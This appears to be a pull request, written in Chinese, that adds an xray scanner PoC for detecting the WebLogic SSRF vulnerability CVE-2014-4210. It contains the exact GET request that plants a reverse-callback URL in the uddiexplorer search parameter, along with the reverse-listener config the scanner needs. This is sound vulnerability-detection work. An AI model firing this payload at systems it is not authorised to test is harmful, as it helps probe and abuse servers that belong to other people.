### PR TITLE
增加 weblogic ssrf漏洞检测poc

### DIFF
--- a/pocs/weblogic-ssrf-cve-2014-4210.yml
+++ b/pocs/weblogic-ssrf-cve-2014-4210.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-weblogic-ssrf-cve-2014-4210
+rules:
+  - method: GET
+    path: >-
+      /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator={{reverse_url}}
+    follow_redirects: false
+    expression: |
+      status==200 && waitReverse(5)
+detail:
+  author: j4ckzh0u(https://github.com/j4ckzh0u)
+  links: 
+    - https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf

--- a/pocs/weblogic-ssrf-cve-2014-4210.yml
+++ b/pocs/weblogic-ssrf-cve-2014-4210.yml
@@ -8,5 +8,5 @@ rules:
       status==200 && waitReverse(5)
 detail:
   author: j4ckzh0u(https://github.com/j4ckzh0u)
-  links: 
+  links:
     - https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf


### PR DESCRIPTION

## 本 poc 是对weblogic ssrf漏洞进行检测的

## 测试环境

测试环境的docker-compse地址 `https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf`

## 备注
测试该漏洞时，需要在xray的config.yml的reverse段进行如下配置：
```
...
reverse:
  db_file_path: "./xray.db"
  token: ""
  http:
    enabled: true
    listen_ip: 192.168.3.1 # 这个IP是用来进行反弹连接的，是xray运行的主机的IP地址
    listen_port: ""
...
```